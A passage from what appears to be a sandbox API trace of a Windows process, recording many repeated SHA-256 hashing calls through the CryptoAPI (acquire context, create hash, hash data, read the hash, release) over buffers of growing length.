dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.857] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.857] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0230.857] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.857] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31faf0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31faf0, pdwDataLen=0x12e8b8) returned 1 [0230.857] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.857] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.857] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.858] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.858] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x500, dwFlags=0x0) returned 1 [0230.858] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.858] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fb20, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fb20, pdwDataLen=0x12e8b8) returned 1 [0230.858] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.858] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.858] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.858] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.858] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x520, dwFlags=0x0) returned 1 [0230.858] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.858] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fb50, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fb50, pdwDataLen=0x12e8b8) returned 1 [0230.858] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.858] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.858] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.859] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.859] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x540, dwFlags=0x0) returned 1 [0230.859] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.859] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fb80, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fb80, pdwDataLen=0x12e8b8) returned 1 [0230.859] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.859] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.859] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.859] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.859] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x560, dwFlags=0x0) returned 1 [0230.859] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.859] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fbb0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fbb0, pdwDataLen=0x12e8b8) returned 1 [0230.859] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.859] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.859] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.860] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.860] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x580, dwFlags=0x0) returned 1 [0230.860] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.860] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fbe0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fbe0, pdwDataLen=0x12e8b8) returned 1 [0230.860] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.860] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.860] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.860] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.860] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0230.860] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.860] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f490, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f490, pdwDataLen=0x12e8b8) returned 1 [0230.860] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.860] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.860] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.861] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.861] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0230.861] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.861] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fc60, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fc60, pdwDataLen=0x12e8b8) returned 1 [0230.861] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.861] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.861] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.861] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.861] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0230.861] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.861] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fcc0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fcc0, pdwDataLen=0x12e8b8) returned 1 [0230.861] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.862] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.862] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.862] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.862] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x600, dwFlags=0x0) returned 1 [0230.862] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.862] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fcf0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fcf0, pdwDataLen=0x12e8b8) returned 1 [0230.862] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.862] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.862] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.862] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.862] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x620, dwFlags=0x0) returned 1 [0230.863] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.863] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fd20, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fd20, pdwDataLen=0x12e8b8) returned 1 [0230.863] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.863] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.863] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.863] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.863] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x640, dwFlags=0x0) returned 1 [0230.863] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.863] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fd50, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fd50, pdwDataLen=0x12e8b8) returned 1 [0230.863] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.863] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.863] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.864] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.864] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x660, dwFlags=0x0) returned 1 [0230.864] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.864] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fd80, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fd80, pdwDataLen=0x12e8b8) returned 1 [0230.864] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.864] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.864] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.864] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.864] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x680, dwFlags=0x0) returned 1 [0230.864] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.864] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fdb0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fdb0, pdwDataLen=0x12e8b8) returned 1 [0230.864] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.864] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.864] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.865] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.865] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0230.865] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.865] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fde0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fde0, pdwDataLen=0x12e8b8) returned 1 [0230.865] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.865] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.865] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.865] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.865] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0230.865] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.865] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fe10, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fe10, pdwDataLen=0x12e8b8) returned 1 [0230.865] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.865] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.865] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.866] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.866] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0230.866] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.866] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fe40, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fe40, pdwDataLen=0x12e8b8) returned 1 [0230.866] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.866] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.866] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.866] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.866] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x700, dwFlags=0x0) returned 1 [0230.866] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.866] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fe70, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fe70, pdwDataLen=0x12e8b8) returned 1 [0230.866] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.866] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.866] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.867] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.867] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x720, dwFlags=0x0) returned 1 [0230.867] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.867] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fea0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fea0, pdwDataLen=0x12e8b8) returned 1 [0230.867] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.867] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.867] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.867] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.867] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x740, dwFlags=0x0) returned 1 [0230.867] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.867] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fed0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fed0, pdwDataLen=0x12e8b8) returned 1 [0230.867] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.867] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.867] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.868] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.868] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x760, dwFlags=0x0) returned 1 [0230.868] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.868] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31ff00, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31ff00, pdwDataLen=0x12e8b8) returned 1 [0230.868] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.868] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.868] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.868] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.868] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x780, dwFlags=0x0) returned 1 [0230.868] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.868] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31ff30, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31ff30, pdwDataLen=0x12e8b8) returned 1 [0230.869] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.869] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.869] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.869] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.869] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0230.869] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.869] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31ff60, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31ff60, pdwDataLen=0x12e8b8) returned 1 [0230.869] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.869] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.869] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.869] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.869] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0230.870] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.870] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31ff90, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31ff90, pdwDataLen=0x12e8b8) returned 1 [0230.870] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.870] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.870] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.870] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.870] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0230.870] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.870] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31ffc0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31ffc0, pdwDataLen=0x12e8b8) returned 1 [0230.870] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.870] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.870] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.871] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.871] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x800, dwFlags=0x0) returned 1 [0230.871] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.871] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fff0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fff0, pdwDataLen=0x12e8b8) returned 1 [0230.871] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.871] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.871] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.871] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.871] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x820, dwFlags=0x0) returned 1 [0230.871] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.871] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320020, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320020, pdwDataLen=0x12e8b8) returned 1 [0230.871] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.871] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.871] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.872] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.872] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x840, dwFlags=0x0) returned 1 [0230.872] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.872] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320050, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320050, pdwDataLen=0x12e8b8) returned 1 [0230.872] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.872] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.872] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.872] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, 